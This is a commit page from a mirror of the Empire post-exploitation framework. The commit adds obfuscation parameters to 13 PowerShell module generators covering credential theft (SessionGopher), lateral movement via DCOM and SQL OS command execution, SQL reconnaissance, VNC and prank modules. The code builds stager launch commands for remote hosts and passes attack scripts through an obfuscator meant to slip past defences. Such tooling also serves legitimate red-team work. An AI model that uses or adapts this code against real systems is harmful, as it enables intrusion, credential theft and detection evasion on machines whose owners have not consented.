infosecn1nja
/
Empire
mirror of https://github.com/infosecn1nja/Empire.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch '2.0_beta' of https://github.com/cobbr/ObfuscatedEmpire into 2.0_beta

mdns
cobbr 2017-06-19 22:35:34 -05:00
parent 8f98d642d8 f2b025395f
commit c691830ddd
13 changed files with 137 additions and 75 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/modules/powershell/collection/get_indexed_item.py
View File

@ -55,7 +55,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-IndexedItem.ps1"

32
lib/modules/powershell/collection/get_sql_column_sample_data.py
View File

@ -67,7 +67,7 @@ class Module:
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
username = self.options['Username']['Value']
password = self.options['Password']['Value']
@ -78,34 +78,42 @@ class Module:
# read in the common module source code
moduleSource = self.mainMenu.installPath + "data/module_source/collection/Get-SQLColumnSampleData.ps1"
script = ""
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
script = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(moduleSource, 'r') as source:
script = source.read()
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
if check_all:
auxModuleSource = self.mainMenu.installPath + "data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=auxModuleSource, obfuscationCommand=obfuscationCommand)
auxModuleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(auxModuleSource, 'r') as auxSource:
auxScript = auxSource.read()
script += " " + auxScript
except:
print helpers.color("[!] Could not read additional module source path at: " + str(auxModuleSource))
script += " Get-SQLInstanceDomain "
scriptEnd = " Get-SQLInstanceDomain "
if username != "":
script += " -Username "+username
scriptEnd += " -Username "+username
if password != "":
script += " -Password "+password
script += " | "
script += " Get-SQLColumnSampleData"
scriptEnd += " -Password "+password
scriptEnd += " | "
scriptEnd += " Get-SQLColumnSampleData"
if username != "":
script += " -Username "+username
scriptEnd += " -Username "+username
if password != "":
script += " -Password "+password
scriptEnd += " -Password "+password
if instance != "" and not check_all:
script += " -Instance "+instance
scriptEnd += " -Instance "+instance
if no_defaults:
script += " -NoDefaults "
scriptEnd += " -NoDefaults "
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

19
lib/modules/powershell/collection/get_sql_query.py
View File

@ -60,7 +60,7 @@ class Module:
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
username = self.options['Username']['Value']
password = self.options['Password']['Value']
@ -70,6 +70,9 @@ class Module:
# read in the common module source code
moduleSource = self.mainMenu.installPath + "data/module_source/collection/Get-SQLQuery.ps1"
script = ""
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(moduleSource, 'r') as source:
script = source.read()
@ -77,13 +80,15 @@ class Module:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
script += " Get-SQLQuery"
scriptEnd = " Get-SQLQuery"
if username != "":
script += " -Username "+username
scriptEnd += " -Username "+username
if password != "":
script += " -Password "+password
scriptEnd += " -Password "+password
if instance != "":
script += " -Instance "+instance
script += " -Query "+"\'"+query+"\'"
scriptEnd += " -Instance "+instance
scriptEnd += " -Query "+"\'"+query+"\'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

15
lib/modules/powershell/credentials/sessiongopher.py
View File

@ -105,12 +105,15 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# if you're reading in a large, external script that might be updates,
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-SessionGopher.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -121,7 +124,7 @@ class Module:
f.close()
script = moduleCode
script += "Invoke-SessionGopher"
scriptEnd = "Invoke-SessionGopher"
# add any arguments to the end execution of the script
for option,values in self.options.iteritems():
@ -129,8 +132,10 @@ class Module:
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

14
lib/modules/powershell/lateral_movement/invoke_dcom.py
View File

@ -83,7 +83,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
method = self.options['Method']['Value']
@ -93,7 +93,9 @@ class Module:
proxyCreds = self.options['ProxyCreds']['Value']
moduleSource = self.mainMenu.installPath + "/data/module_source/lateral_movement/Invoke-DCOM.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -124,9 +126,11 @@ class Module:
else:
stagerCmd = '%COMSPEC% /C start /b C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
script += "Invoke-DCOM -ComputerName %s -Method %s -Command '%s'" % (computerName, method, stagerCmd)
scriptEnd = "Invoke-DCOM -ComputerName %s -Method %s -Command '%s'" % (computerName, method, stagerCmd)
script += "| Out-String | %{$_ + \"`n\"};"
scriptEnd += "| Out-String | %{$_ + \"`n\"};"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

14
lib/modules/powershell/lateral_movement/invoke_sqloscmd.py
View File

@ -74,7 +74,7 @@ class Module:
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
credID = self.options["CredID"]['Value']
if credID != "":
@ -101,6 +101,9 @@ class Module:
moduleSource = self.mainMenu.installPath + "data/module_source/lateral_movement/Invoke-SQLOSCmd.ps1"
moduleCode = ""
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(moduleSource, 'r') as source:
moduleCode = source.read()
@ -122,10 +125,13 @@ class Module:
command = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
script += "Invoke-SQLOSCmd -Instance \"%s\" -Command \"%s\"" % (instance, command)
scriptEnd = "Invoke-SQLOSCmd -Instance \"%s\" -Command \"%s\"" % (instance, command)
if username != "":
script += " -UserName "+username
scriptEnd += " -UserName "+username
if password != "":
script += " -Password "+password
scriptEnd += " -Password "+password
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

15
lib/modules/powershell/management/vnc.py
View File

@ -71,13 +71,15 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in th Invoke-Vnc.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/management/Invoke-Vnc.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -89,14 +91,17 @@ class Module:
script = moduleCode
script += "\nInvoke-Vnc"
scriptEnd = "\nInvoke-Vnc"
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

23
lib/modules/powershell/recon/get_sql_server_login_default_pw.py
View File

@ -62,7 +62,7 @@ class Module:
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
username = self.options['Username']['Value']
password = self.options['Password']['Value']
instance = self.options['Instance']['Value']
@ -71,6 +71,9 @@ class Module:
# read in the common module source code
moduleSource = self.mainMenu.installPath + "data/module_source/recon/Get-SQLServerLoginDefaultPw.ps1"
script = ""
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(moduleSource, 'r') as source:
script = source.read()
@ -80,19 +83,25 @@ class Module:
if check_all:
auxModuleSource = self.mainMenu.installPath + "data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=auxModuleSource, obfuscationCommand=obfuscationCommand)
auxModuleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(auxModuleSource, 'r') as auxSource:
auxScript = auxSource.read()
script += " " + auxScript
except:
print helpers.color("[!] Could not read additional module source path at: " + str(auxModuleSource))
script += " Get-SQLInstanceDomain "
scriptEnd = " Get-SQLInstanceDomain "
if username != "":
script += " -Username "+username
scriptEnd += " -Username "+username
if password != "":
script += " -Password "+password
script += " | Select Instance | "
script += " Get-SQLServerLoginDefaultPw"
scriptEnd += " -Password "+password
scriptEnd += " | Select Instance | "
scriptEnd += " Get-SQLServerLoginDefaultPw"
if instance != "" and not check_all:
script += " -Instance "+instance
scriptEnd += " -Instance "+instance
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

15
lib/modules/powershell/situational_awareness/host/monitortcpconnections.py
View File

@ -78,7 +78,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# the PowerShell script itself, with the command to invoke
# for execution appended to the end. Scripts should output
@ -91,6 +91,9 @@ class Module:
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/host/Start-MonitorTCPConnections.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -101,7 +104,7 @@ class Module:
f.close()
script = moduleCode
script += "Start-TCPMonitor"
scriptEnd = "Start-TCPMonitor"
# add any arguments to the end execution of the script
for option,values in self.options.iteritems():
@ -109,8 +112,10 @@ class Module:
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

25
lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py
View File

@ -79,7 +79,7 @@ class Module:
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
domainController = self.options['DomainController']['Value']
computerName = self.options['ComputerName']['Value']
@ -92,6 +92,9 @@ class Module:
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1"
script = ""
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(moduleSource, 'r') as source:
script = source.read()
@ -99,20 +102,22 @@ class Module:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
script += " Get-SQLInstanceDomain"
scriptEnd = " Get-SQLInstanceDomain"
if username != "":
script += " -Username " + username
scriptEnd += " -Username " + username
if password != "":
script += " -Password " + password
scriptEnd += " -Password " + password
if domainController != "":
script += " -DomainController "+domainController
scriptEnd += " -DomainController "+domainController
if computerName != "":
script += " -ComputerName "+computerName
scriptEnd += " -ComputerName "+computerName
if domainAccount != "":
script += " -DomainAccount "+domainAccount
scriptEnd += " -DomainAccount "+domainAccount
if checkMgmt.lower() != "false":
script += " -CheckMgmt"
scriptEnd += " -CheckMgmt"
if udpTimeOut != "":
script += " -UDPTimeOut "+udpTimeOut
scriptEnd += " -UDPTimeOut "+udpTimeOut
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

28
lib/modules/powershell/situational_awareness/network/get_sql_server_info.py
View File

@ -60,7 +60,7 @@ class Module:
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
username = self.options['Username']['Value']
password = self.options['Password']['Value']
instance = self.options['Instance']['Value']
@ -69,6 +69,9 @@ class Module:
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Get-SQLServerInfo.ps1"
script = ""
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(moduleSource, 'r') as source:
script = source.read()
@ -78,24 +81,29 @@ class Module:
if check_all:
auxModuleSource = self.mainMenu.installPath + "data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=auxModuleSource, obfuscationCommand=obfuscationCommand)
auxModuleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(auxModuleSource, 'r') as auxSource:
auxScript = auxSource.read()
script += " " + auxScript
except:
print helpers.color("[!] Could not read additional module source path at: " + str(auxModuleSource))
script += " Get-SQLInstanceDomain "
scriptEnd = " Get-SQLInstanceDomain "
if username != "":
script += " -Username "+username
scriptEnd += " -Username "+username
if password != "":
script += " -Password "+password
script += " | "
script += " Get-SQLServerInfo"
scriptEnd += " -Password "+password
scriptEnd += " | "
scriptEnd += " Get-SQLServerInfo"
if username != "":
script += " -Username "+username
scriptEnd += " -Username "+username
if password != "":
script += " -Password "+password
scriptEnd += " -Password "+password
if instance != "" and not check_all:
script += " -Instance "+instance
scriptEnd += " -Instance "+instance
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

5
lib/modules/powershell/trollsploit/get_schwifty.py
View File

@ -56,7 +56,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """
Function Get-Schwifty
@ -98,5 +98,6 @@ Function Get-Schwifty
script += " -" + str(option) + " " + str(values['Value'])
script += "; 'Agent is getting schwifty!'"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
return script

5
lib/modules/powershell/trollsploit/wlmdr.py
View File

@ -65,7 +65,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """
function Invoke-Wlrmdr {
@ -107,5 +107,6 @@ Invoke-Wlrmdr"""
script += " -" + str(option)
else:
script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\""
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
return script